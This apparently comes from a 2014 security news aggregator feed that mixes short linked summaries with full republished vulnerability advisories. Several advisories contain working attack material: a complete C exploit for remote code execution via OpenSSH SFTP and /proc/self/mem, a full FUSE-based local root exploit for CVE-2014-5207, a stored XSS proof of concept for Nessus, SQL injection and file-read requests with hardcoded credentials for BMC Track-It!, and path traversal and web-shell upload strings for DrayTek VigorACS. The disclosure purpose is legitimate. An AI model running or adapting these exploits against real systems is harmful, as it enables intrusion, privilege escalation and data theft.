Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Tyupkin: Manipulating ATM Machines with Malware

October 7, 2014, 4:06 am
$
0
0
Earlier this year, at the request of a financial institution, Kaspersky Lab's Global Research and Analysis Team performed a forensics investigation into a cyber-criminal attack targeting multiple ATMs in Eastern Europe.

During the course of this investigation, we discovered a piece of malware that allowed attackers to empty the ATM cash cassettes via direct manipulation.

At the time of the investigation, the malware was active on more than 50 ATMs at banking institutions in Eastern Europe.  Based on submissions to VirusTotal, we believe that the malware has spread to several other countries, including the U.S., India and China.

more here..........https://securelist.com/blog/research/66988/tyupkin-manipulating-atm-machines-with-malware/
Search

Paper: Secure Key Storage and SecureComputation in Android

October 7, 2014, 4:16 am
$
0
0
The increasing usage of smartphones also gains the interest of criminals who shift their
focus from attacking, for example, internet banking in a browser to attacking mobile
banking using an application on a smartphone or a tablet. Of course this is not limited to
banking applications, also other mobile services are expected to see increased fraudulent
activities in the coming years. Two important solutions to protect against attacks
on mobile devices are secure key storage and secure computation. Secure key storage
provides an environment where secret values needed for securing communication between
parties are stored. Secure computation offers a secure environment within a device
where trusted applications can run and handle sensitive operations such as asking for a
PIN-code.

direct download and more here........... http://www.ru.nl/publish/pages/578936/scriptie_tim_cooijmans.pdf

My Adventure With Fireeye FLARE Challenge

October 7, 2014, 4:40 am
$
0
0
These are my (rather long) solutions to Fireeye’s FLARE challenge. This is just not the solution but other ways that I tried. This was a great learning experience for me so I am writing this post to document everything I tried. As a result, this post is somewhat long.

more here.........http://parsiya.net/blog/2014-10-07-my-adventure-with-fireeye-flare-challenge/

Reverse Engineering Star Wars: Yoda Stories

October 7, 2014, 4:43 am
$
0
0
I don't know why, but I've always gotten a kick out of reverse engineering data files for computer games. Although decompiling a game's code is a challenging task, data files are often much easier to figure out (as they contain lots of highly visible content like text and sprites) and let you mod the game if you're able to figure it out sufficiently.

more here.........http://www.zachtronics.com/yoda-stories/

Veil-Ordnance – Fast Stager Shellcode Generation

October 7, 2014, 9:42 am
$
0
0
Generating shellcode is a task that nearly all pen testers have to do at some point, unless they write their own shellcode.  The typical way of generating shellcode consists of using msfvenom, or the combination of msfpayload and msfencode.  Both of these methods can easily generate shellcode for the payload of your choice, and you can invoke shellcode encoders, if necessary, to avoid bad characters.

Since its release, Veil-Evasion has always relied on msfvenom for generating the shellcode within Veil-Evasion payloads.  Leveraging another tool’s capabilities has allowed us to rely on the Metasploit Framework to handle the shellcode generation without requiring too much effort on our end.  However, this has also caused some issues.

more here..........https://www.veil-framework.com/veil-ordnance-fast-shellcode-generation/

Cuckoo Sandbox 1.1.1

October 7, 2014, 9:43 am
$
0
0
This is an immediate release of Cuckoo Sandbox 1.1.1, an hotfix for a security vulnerability discovered by Robert Michel from G-Data. The vulnerability is an arbitrary file upload from the guest virtual machines to the host system, which could potentially translate in command or code execution. It affects all versions of Cuckoo Sandbox from 0.6.

more here..........http://cuckoosandbox.org/2014-10-07-cuckoo-sandbox-111.html

Massive Moniker.com Breach, Valuable Domains Stolen

October 7, 2014, 9:44 am
$
0
0
Yesterday Acro.net and his other site DomainGang.com posted two important articles related to a breach at Moniker.com . I wanted to write yesterday but I was pretty busy with other stuff, plus behind the scenes I was working with an effected domain owner on the phone and digging information on the potential domain thefts. This is very important, so you need to be aware!! If you have a Moniker.com account, you really need to pay attention and take some actions!

more here........http://dotweekly.com/massive-moniker-com-breach-valuable-domains-stolen/

Nessus Web UI 2.3.3: Stored XSS

October 7, 2014, 11:32 am
$
0
0
Nessus Web UI 2.3.3: Stored XSS
=========================================================

CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version -

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
    def getResourceFor(self, request):
        request.setHeader('server', '<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0

    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"

log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.


-- Timeline --

2014-06-12   Release of Web UI version 2.3.3, build#83

2014-06-13        Vulnerability discovered and creation of POC

2014-06-13        Vulnerability responsibly reported to vendor

2014-06-13        Vulnerability acknowledged by vendor

2014-06-13        Release of Web UI version 2.3.4, build#85

2014-XX-XX        Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at] thesecurityfactory.be
Search

CVE-2014-4502 (Updated) : Invalid Handling of Length Parameter in Stratum mining.notify Message Leads to Heap Overflow

October 7, 2014, 11:39 am
$
0
0
Vulnerability title: Invalid Handling of Length Parameter in Stratum
mining.notify Message Leads to Heap Overflow
CVE: CVE-2014-4502
Affected version: SGMiner before 4.2.2, CGMiner before 4.3.5, BFGMiner
before 4.1.0, CPUMiner before 2.4.1
Reported by: Mick Ayzenberg of Deja vu Security

Details:

A pool responds to a "mining.subscribe" Stratum request with a list of
parameters the application will use when mining.  Two of these
parameters are "Extranonce1", a hex-encoded string, and
"Extranonce2_size", the length of a nonce the miner can increment.

A malicious pool or an attacker who is in middle of a valid Stratum
connection can respond to a "mining.subscribe" request from a client
with arbitrary Extranonce1 and Extranonce2_size parameters.

An attacker can then send a valid "mining.notify" request to initiate
mining. The "mining.notify" message specifies parameters "coinb1" and
"coinb2", hex encoded strings of arbitrary length.

Cgminer, Sgminer, Bfgminer, and CPUMiner will use the values provided to
calculate memory requirements for a valid block and copy parameters
into this allocated space.  By setting the value of "Extranonc2_size"
to be negative or large, an attacker can force the "parse_notify"
function to allocate less memory than expected and overwrite memory in
the heap.

CVE-2014-6251 : Stack Overflow in CPUMiner When Submitting Upstream Work

October 7, 2014, 11:40 am
$
0
0
Vulnerability title: Stack Overflow in CPUMiner When Submitting Upstream
Work
CVE: CVE-2014-6251
Affected version: CPUMiner before 2.4.1
Reported by: Mick Ayzenberg of Deja vu Security

Details:

A malicious pool or an attacker who is in the middle of a valid
stratum connection can respond to a 'mining.subscribe' and instruct a
miner to use a large nonce2 length.

The attacker can then instruct the miner to generate blocks with a
standard 'mining.notify' request. Once the miner has discovered a
valid block it will attempt to copy this large nonce into a fixed size
character array and overflow into stack memory.

Huge Data Leak at Largest U.S. Bond Insurer

October 7, 2014, 11:50 am
$
0
0
On Monday, KrebsOnSecurity notified the Municipal Bond Insurance Association — the nation’s largest bond insurer — that a misconfiguration in a company Web server had exposed countless customer account numbers, balances and other sensitive data. Much of the information had been indexed by search engines, including a page listing administrative credentials that attackers could use to access data that wasn’t already accessible via a simple Web search.

more here...........http://krebsonsecurity.com/2014/10/huge-data-leak-at-largest-u-s-bond-insurer/

How to steal access to over 500,000 bank accounts: The insider view of a Russian cybercrime infrastructure

October 7, 2014, 11:52 am
$
0
0
Proofpoint security researchers have published an analysis that exposes the inner workings of a cybercrime operation targeting online banking credentials for banks in the United States and Europe. This Proofpoint research report provides a detailed and rarely seen inside view of the infrastructure, tools and techniques that enabled this cybercrime group to infect over 500,000 PCs.

more here...........http://www.proofpoint.com/threatinsight/posts/the-insider-view-of-a-russian-cybercrime-infrastructure.php

NCR ATM API Documentation Available on Baidu

October 7, 2014, 11:58 am
$
0
0
A recent ATM breach in Malaysia has caused havoc for several local banks. According to reports, approximately 3 million Malaysian Ringgit (almost 1 million USD) was stolen from 18 ATMs. There is no detailed information on how the attack was performed by the criminals, but according to one local news report, police claimed the criminals installed malware with the file name "ulssm.exe" which was found on the compromised ATMs. Based on the file name, we know that the malware in question was first discovered by Symantec and it is known as "PadPin".

more here...........http://www.f-secure.com/weblog/archives/00002751.html

Escaping DynamoRIO and Pin - or why it's a worse-than-you-think idea to run untrusted code or to input untrusted data

October 7, 2014, 1:38 pm
$
0
0
Before we begin, I want to clarify that both DynamoRIO and Pin are great tools that I use all the time. Dynamic Binary Modification is a very powerful technique in general. However, both implementations have a limitation which can have serious security implications for some uses cases and which, as far as I can tell, is not documented in the user manuals. I got in touch with people involved in both projects and they've explained that they consider it low risk for the typical usage scenario and that fixing it would add performance overhead. This is a perfectly reasonable position, but I think this sort of low risk / high impact issue should be very well and visibly documented.

more here..........https://github.com/lgeek/dynamorio_pin_escape

OpenSSH

October 7, 2014, 6:14 pm
$
0
0
OpenSSH lets you grant SFTP access to users without allowing full command
execution using "ForceCommand internal-sftp". However, if you misconfigure
the server and don't use ChrootDirectory, the user will be able to access
all parts of the filesystem that he has access to - including procfs. On
modern Linux kernels (>=2.6.39, I think), /proc/self/maps reveals the
memory layout and /proc/self/mem lets you write to arbitrary memory
positions. Combine those and you get easy RCE.

The linux version of OpenSSH 6.7 contains a mitigation, see the release notes:

 * sftp-server(8): On platforms that support it, use prctl() to
   prevent sftp-server from accessing /proc/self/{mem,maps}

Here's my PoC for 64bit Linux:

#define _GNU_SOURCE

// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
// (In other words, please don't use this against other people's machines.)

#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>

#define min(a,b) (((a)<(b))?(a):(b))

sftp_session sftp;

size_t grab_file(char *rpath, char **out) {
  size_t allocated = 4000, used = 0;
  *out = calloc(1, allocated+1);
  sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
  if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
  while (1) {
    ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
    if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
    if (nbytes == 0) {
      (*out)[used] = '\0';
      sftp_close(f);
      return used;
    }
    used += nbytes;
    if (used == allocated) {
      allocated *= 4;
      *out = realloc(*out, allocated);
    }
  }
}

void dump_file(char *name, void *buf, size_t len) {
  FILE *f = fopen(name, "w+");
  if (!f) perror("can't write to local file"), exit(1);
  if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
  if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
}

size_t slurp_file(char *path, char **out) {
  size_t allocated = 4000, used = 0;
  *out = calloc(1, allocated+1);
  FILE *f = fopen(path, "r");
  if (f == NULL) perror("opening local file failed"), exit(1);
  while (1) {
    ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
    if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
    if (nbytes == 0) {
      (*out)[used] = '\0';
      if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
      return used;
    }
    used += nbytes;
    if (used == allocated) {
      allocated *= 4;
      *out = realloc(*out, allocated);
    }
  }
}

int main(int argc, char **argv) {
  if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
  char *target_host = argv[1];
  char *target_user = argv[2];
  char *shell_commands = argv[3];

  ssh_session my_ssh_session;
  int rc;
  char *password;
  // Open session and set options
  my_ssh_session = ssh_new();
  if (my_ssh_session == NULL) exit(-1);
  ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
  ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
  // Connect to server
  rc = ssh_connect(my_ssh_session);
  if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  // Authenticate ourselves
  password = getpass("Password: ");
  rc = ssh_userauth_password(my_ssh_session, NULL, password);
  if (rc != SSH_AUTH_SUCCESS)
    fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  sftp = sftp_new(my_ssh_session);
  if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);

  rc = sftp_init(sftp);
  if (rc != SSH_OK) {
    fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
    sftp_free(sftp);
    return rc;
  }

  char *mappings;
  grab_file("/proc/self/maps", &mappings);
  //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);

  printf("got /proc/self/maps. looking for libc...\n");
  // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466                    /lib/x86_64-linux-gnu/libc-2.13.so
  long long start_addr, end_addr, offset;
  char *libc_path = NULL;
  long long stack_start_addr = 0, stack_end_addr;
  for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
    if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
      if (libc_path) fprintf(stderr, "warning: two times libc?\n");
      printf("mapping line: %s\n", p);
      if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
      libc_path = strdup(strchr(p, '/'));
      if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
    }
    if (strstr(p, "[stack]")) {
      if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
      printf("mapping line: %s\n", p);
      if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
    }
  }
  if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
  if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
  printf("remote libc is at %s\n", libc_path);
  printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);

  char *libc;
  size_t libc_size = grab_file(libc_path, &libc);
  dump_file("libc.so", libc, libc_size);
  printf("downloaded libc, size is %zu bytes\n", libc_size);

  system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
  char *system_offset_str;
  slurp_file("system.addr", &system_offset_str);
  long long system_offset;
  if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
  long long remote_system_addr = start_addr+system_offset-offset;
  printf("remote system() function is at %Lx\n", remote_system_addr);

  printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
  char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
  if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
  long long gadget_address = start_addr + (gadget-(libc+offset));
  long long ret_address = gadget_address+1;
  printf("found gadget at %Lx\n", gadget_address);

  printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
  printf("doing it the quick-and-dirty way (that means: pray that the target"
         "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
  long long stack_len = stack_end_addr - stack_start_addr;
  /*if (stack_len > 32000) {
    stack_len = 32000;
    stack_start_addr = stack_end_addr - stack_len;
  }*/
  char *new_stack = malloc(stack_len);

  // first fill it with our ret slide
  for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
    *s = ret_address;
  }

  // put some shell commands in the head
  strcpy(new_stack, shell_commands);

  // put the mini-ROP-chain at the end
  // [address of pop rdi] [stack head] [address of system]
  long long *se = (void*)(new_stack + stack_len);
  se[-3] = gadget_address;
  se[-2] = stack_start_addr;
  se[-1] = remote_system_addr;

  printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
  sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
  if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);

  // first send over the string
  rc = sftp_seek64(mem, stack_start_addr);
  if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
  ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
  if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");

  // now send over the rest right-to-left
  for (long long off = stack_len-32000; off >= 0; off -= 32000) {
    rc = sftp_seek64(mem, stack_start_addr+off);
    if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
    mem_written = sftp_write(mem, new_stack+off, 32000);
    if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
  }

  return 0;
}


Authored by Jann Horn



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Search

[CERT VU#121036 / Multiple CVEs] RCE, domain admin creds leakage and more in BMC Track-It!

October 7, 2014, 6:14 pm
$
0
0
Hi,

tl;dr - I am releasing two 0 day exploits for BMC Track-It!. One is a
RCE and the other gets you the domain admin and SQL database creds.
Other minor vulns are also disclosed. Details below.

CERT handled the disclosure for these vulnerabilities (see CERT
VU#121036) and according to them BMC didn't even acknowledge the issue
for 45 days.

BMC have contacted me directly today, but it's too late now, the cat
is out of the bag as the CERT advisory has been published. Any
vulnerability researcher worth their salt will be able to work out how
to exploit these issues, so there is no point in holding back on
releasing the exploits.

The exploits have been submitted to Metasploit and should be released soon, see:
https://github.com/rapid7/metasploit-framework/pull/3965
https://github.com/rapid7/metasploit-framework/pull/3966

>> Multiple critical vulnerabilities in BMC Track-It!
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================

The application exposes several .NET remoting services on port 9010.
.NET remoting is a RMI technology similar to Java RMI or CORBA which
allows you to invoke methods remotely and retrieve their result. In
BMC Track-It!, the .NET remoting services are unauthenticated and
unencrypted, meaning that anyone can invoke all the exposed methods
remotely.

It is possible to capture traffic and decode the packet format by
looking at the (incomplete) Microsoft .NET remoting specifications.
Using these techniques, two Metasploit modules were produced: one is a
exploit module that can upload arbitrary files to the web root and
achieve remote code execution, and the other is an auxiliary module
that allows retrieval of the SQL and domain administrator credentials.

Three other vulnerabilities (SQL injection, arbitrary file download
and hardcoded database credentials) were also discovered.

A special thanks to CERT for handling the communication to BMC and the
disclosure of these vulnerabilities. These issues are tracked by CERT
as VU#121036 (http://www.kb.cert.org/vuls/id/121036).


>> Background on the affected product:
"Track-It! IT Help Desk Software includes everything you need for IT
Help Desk management. Full featured, easy to deploy, easy to use and
cost-effective, Track-It! Help Desk is designed specifically with the
needs of small to mid-sized organizations in mind.
Over 55,000 organizations worldwide have trusted Track-It! for their
IT help desk ticketing and asset management needs. Track-It! IT Help
Desk Software includes, helpdesk, work order ticket tracking, incident
and problem management, knowledge management, service level
management, asset management, change management, software license
management, mobile device access, end-user self-service and more.
Track-It! Help Desk delivers the strength of ITSM best practices with
the simplicity of smooth installation and quick configuration to
provide instant return on your investment."


>> Technical details:
#1 Domain administrator and SQL server user credentials disclosure
(unauthenticated)
Versions affected: 9 to 11.3+ (version 8 might be affected, but could
not be confirmed)
CVE-2014-4872

The application exposes an unauthenticated .NET remoting configuration
service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a
configuration file that contains the application database name,
username and password as well as the domain administrator username and
password. These are encrypted using a fixed key and IV ("NumaraIT")
using the DES algorithm. The domain administrator username and
password can only be obtained if the Self-Service component is
enabled, which is the most common scenario in enterprise deployments.
A Metasploit module that exploits this vulnerability has been released.


#2 Remote code execution via file upload (unauthenticated)
Versions affected: 8 to 11.3+
CVE-2014-4872 (same as #1)

The application exposes an unauthenticated .NET remoting file storage
service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an
arbitrary path on the machine that is running Track-It!. This can be
used to upload a file to the web root and achieve code execution as
NETWORK SERVICE or SYSTEM.
A Metasploit module that exploits this vulnerability has been released.


#3 Blind SQL injection (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4873

POST /TrackItWeb/Grid/GetData
pagingMode=0&id=WebGrid.21&appFilters=[{"type":"numeric","field":"userid
 = 51)) blag; $CREATE TABLE lol(lulz text);$ select woid from (select
woid, row_number() over (ORDER BY woid) RowNumber from z$vTASKS_BROWSE
-- ","comparison":"=","value":51}]

Accepts injection between the two $.


#4 Arbitrary file download (authenticated)
Versions affected: Unknown, at least 11.3
CVE-2014-4874

GET /TrackItWeb/Attachment/Open?attachmentType=1&entityId=1337&entityGuid=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa&fileName=C:\boot.ini


#5 Hardcoded database credentials
Versions affected: Unknown, at least from 8 to 11.3+

When installed with the built-in SQL Express, Track-It! uses the
following hardcoded database credentials:
Username: TrackIt80_1
Password: TI_DB_P@ssw0rd


>> Fix:
UNFIXED - the vendor refused to acknowledge the vulnerabilities and
did not respond to CERT.
Block all communications from untrusted networks (e.g. the Internet)
to ports 9010 to 9020.
Block the database port if you are using the built in SQL Express
(port 49159 is the default in recent versions).
Ensure you do not have any untrusted users with access to Track-It!.


A copy of this advisory can be found in my repo:
https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt

Regards,
Pedro Ribeiro



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Exploit for CVE-2014-5207

October 7, 2014, 11:04 pm
$
0
0
I've been sitting on this for too long.  CVE-2014-5207 was an
interesting bug found by Kenton Varda and Eric Biederman.  Here's a
somewhat ugly PoC root exploit.  You'll need the ability to use FUSE,
although variants would work with removable media or network file
systems, too.

--Andy Lutomirski

/*
  FUSE-based exploit for CVE-2014-5207
  Copyright (c) 2014 Andy Lutomirski

  Based on code that is:
  Copyright (C) 2001-2007  Miklos Szeredi <miklos@szeredi.hu>

  This program can be distributed under the terms of the GNU GPL.
  See the file COPYING.

  gcc -Wall fuse_suid.c `pkg-config fuse --cflags --libs` -o fuse_suid
  mkdir test
  ./fuse_suid test

  This isn't a work of art: it doesn't clean up after itself very well.
*/

#define _GNU_SOURCE
#define FUSE_USE_VERSION 26

#include <fuse.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <err.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <unistd.h>

static const char *sh_path = "/sh";
static int sh_fd;
static loff_t sh_size;

static int hello_getattr(const char *path, struct stat *stbuf)
{
    int res = 0;

    memset(stbuf, 0, sizeof(struct stat));
    if (strcmp(path, "/") == 0) {
        stbuf->st_mode = S_IFDIR | 0755;
        stbuf->st_nlink = 2;
    } else if (strcmp(path, sh_path) == 0) {
        stbuf->st_mode = S_IFREG | 04755;
        stbuf->st_nlink = 1;
        stbuf->st_size = sh_size;
    } else
        res = -ENOENT;

    return res;
}

static int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
             off_t offset, struct fuse_file_info *fi)
{
    (void) offset;
    (void) fi;

    if (strcmp(path, "/") != 0)
        return -ENOENT;

    filler(buf, ".", NULL, 0);
    filler(buf, "..", NULL, 0);
    filler(buf, sh_path + 1, NULL, 0);

    return 0;
}

static int hello_open(const char *path, struct fuse_file_info *fi)
{
    if (strcmp(path, sh_path) != 0)
        return -ENOENT;

    if ((fi->flags & 3) != O_RDONLY)
        return -EACCES;

    return 0;
}

static int hello_read(const char *path, char *buf, size_t size, off_t offset,
              struct fuse_file_info *fi)
{
    (void) fi;
    if (strcmp(path, sh_path) != 0)
        return -ENOENT;

    return pread(sh_fd, buf, size, offset);
}

static struct fuse_operations hello_oper = {
    .getattr    = hello_getattr,
    .readdir    = hello_readdir,
    .open        = hello_open,
    .read        = hello_read,
};

static int evilfd = -1;

static int child2(void *mnt_void)
{
    const char *mountpoint = mnt_void;
    int fd2;

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)
        err(1, "unshare");

    if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)
        err(1, "mount");

    fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);
    if (fd2 == -1)
        err(1, "open");

    if (dup3(fd2, evilfd, O_CLOEXEC) == -1)
        err(1, "dup3");
    close(fd2);

    printf("Mount hackery seems to have worked.\n");

    exit(0);
}

static int child1(const char *mountpoint)
{
    char child2stack[2048];
    char evil_path[1024];

    evilfd = dup(0);
    if (evilfd == -1)
        err(1, "dup");

    if (clone(child2, child2stack,
          CLONE_FILES | CLONE_VFORK,
          (void *)mountpoint) == -1)
        err(1, "clone");

    printf("Here goes...\n");

    sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);
    execl(evil_path, "sh", "-p", NULL);
    perror(evil_path);
    return 1;
}

static int fuse_main_suid(int argc, char *argv[],
              const struct fuse_operations *op,
              void *user_data)
{
    struct fuse *fuse;
    char *mountpoint;
    int multithreaded;
    int res;

    if (argc != 2) {
        printf("Usage: fuse_suid <mountpoint>\n");
        return -EINVAL;
    }

    char *args[] = {"fuse_suid", "-f", "--", argv[1], NULL};

    fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,
              op, sizeof(*op), &mountpoint,
              &multithreaded, user_data);
    if (fuse == NULL)
        return 1;

    printf("FUSE initialized.  Time to have some fun...\n");
    printf("Warning: this exploit hangs on exit.  Hit Ctrl-C when done.\n");
    if (fork() == 0)
        _exit(child1(mountpoint));

    if (multithreaded)
        res = fuse_loop_mt(fuse);
    else
        res = fuse_loop(fuse);

    fuse_teardown(fuse, mountpoint);
    if (res == -1)
        return 1;

    return 0;
}

int main(int argc, char *argv[])
{
    sh_fd = open("/bin/bash", O_RDONLY);
    if (sh_fd == -1)
        err(1, "sh");
    sh_size = lseek(sh_fd, 0, SEEK_END);
    return fuse_main_suid(argc, argv, &hello_oper, NULL);
}



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Analyzing the Network Security Services Library

October 8, 2014, 4:21 am
$
0
0
Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. It implements cryptographic functions in the Firefox and Chrome browsers, and after a recently found certificate signature verification vulnerability, I decided to take a look at this project too.

more here...........http://www.viva64.com/en/b/0286/

DrayTek VigorACS SI (

October 8, 2014, 5:31 am
$
0
0
Vigor ACS-SI Edition is a Central Management System for DrayTek
routers and firewalls,
providing System Integrators or system administration personnel a
real-time integrated
monitoring, configuration and management platform.

-----------------------------------------------------------------------
2.1. Default http-auth username/password used for <ip>/ACSServer/*

We found that most of the VigorACS SI deployments are using the
default http authentication settings (acs/password). This is not so much
a software vulnerability but more a configuration issue.

2.2 Unauthenticated arbitrary file read/write functionality via
UploadDownloadServlet

The UploadDownloadServlet can be used to (read and) write files to the
server directly. In addition, this functionality is accessible without
having to provide the
http authentication details (2.1).

2.3. Path traversal and Local File Inclusion in the FileServlet

The regular expression that is used to prevent this is not sufficient:
it removes occurences of '../' (without the quotes). By providing input
like '....//', the middle '../' will be removed, while the remainder
equals to '../'. We could now use the FileServlet to access any file on
the server:
<ip>/ACSServer/FileServlet?f=....//....//....//....//....//....//....//e
tc/passwd

2.4. Arbitrary file upload in <ip>/ACSServer/UploadFileServlet

This servlet suffers from the same path traversal vulnerability as
described in 2.2. You can POST data to this servlet to upload files
into arbitrary
locations:
http://<ip>//ACSServer/UploadFileServlet?prefix=<URLENCODED('a&....//...
.//....//....//....//server/default/deploy/web.war/shell.jsp&a&a&a&a')>

The UploadFileServlet will append '.cfg' to the given filename, this means files
uploaded via this mechanism aren't directly of use by an attacker. However, when
the payload is a ZIP archive, the vuln. in 2.5 (Local unzip functionality)
can be used to unpack an otherwise benign file into an full-blown
remote web-shell.

2.5. Local unzip functionality

The RPC server provides an unzip functionality (rpcmanager.UnZip) that can be
invoked by using the AMF message broker (accessible via
http://<ip>/ACSServer/messagebroker/amf). This functionality can be used
to unzip any file on the file system like one that has been previously uploaded
using the UploadFileServlet vuln.

2.6. ACS runs as root

The webservice is running as the root user.

-----------------------------------------------------------------------

Timetable:

2014-09-26 : Vendor released patches (private and unverified) to their customers
2014-07-22 : Vendor states that most of the vulns. are patched
2014-07-08 : Vendor notified customers with large deployments
2014-06-30 : Response of Vendor
2014-06-24 : Notified Vendor

Researchers:
Victor van der Veen (vvdveen (at) cs.vu (dot) nl [email concealed])
Erik-Paul Dittmer (epdittmer (at) digitalmisfits (dot) com [email concealed])

- - - - - - - - - - - - - - - - - - - - - - - - - -

//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Adobe Spyware Reveals (Again) the Price of DRM: Your Privacy and Security

October 8, 2014, 6:40 am
$
0
0
The publishing world may finally be facing its “rootkit scandal.” Two independent reports claim that Adobe’s e-book software, “Digital Editions,” logs every document readers add to their local “library,” tracks what happens with those files, and then sends those logs back to the mother-ship, over the Internet, in the clear. In other words, Adobe is not only tracking your reading habits, it’s making it really, really easy for others to do so as well.

more here..........https://www.eff.org/deeplinks/2014/10/adobe-spyware-reveals-again-price-drm-your-privacy-and-security
Viewing all 8064 articles
Browse latest View live
Search